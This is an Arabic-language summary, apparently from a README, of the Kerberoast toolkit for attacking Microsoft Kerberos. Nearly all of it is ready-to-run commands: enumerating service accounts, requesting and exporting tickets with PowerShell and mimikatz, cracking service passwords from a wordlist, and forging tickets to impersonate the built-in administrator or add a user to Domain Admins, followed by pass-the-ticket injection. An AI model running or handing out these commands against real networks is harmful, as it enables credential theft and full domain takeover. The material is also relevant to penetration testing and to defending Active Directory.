
مجموعة أدوات لمهاجمة تطبيقات Kerberos من مايكروسوفت: استخراج حسابات SPN، طلب وتصدير التذاكر، كسر كلمات مرور الخدمات، إعادة كتابة التذاكر للانتحال وتصعيد الامتيازات.
Kerberoast هي مجموعة من الأدوات لمهاجمة تطبيقات Kerberos في أنظمة MS. فيما يلي نظرة عامة مختصرة على وظيفة كل أداة.
PS C:\> setspn -T medin -Q */*
تذكرة واحدة:
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
جميع التذاكر
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
mimikatz # kerberos::list /export
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
جعل المستخدم يظهر كمستخدم آخر
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
إضافة مستخدم إلى مجموعة أخرى (في هذه الحالة مسؤول المجال)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
kerberos::ptt sql.kirbi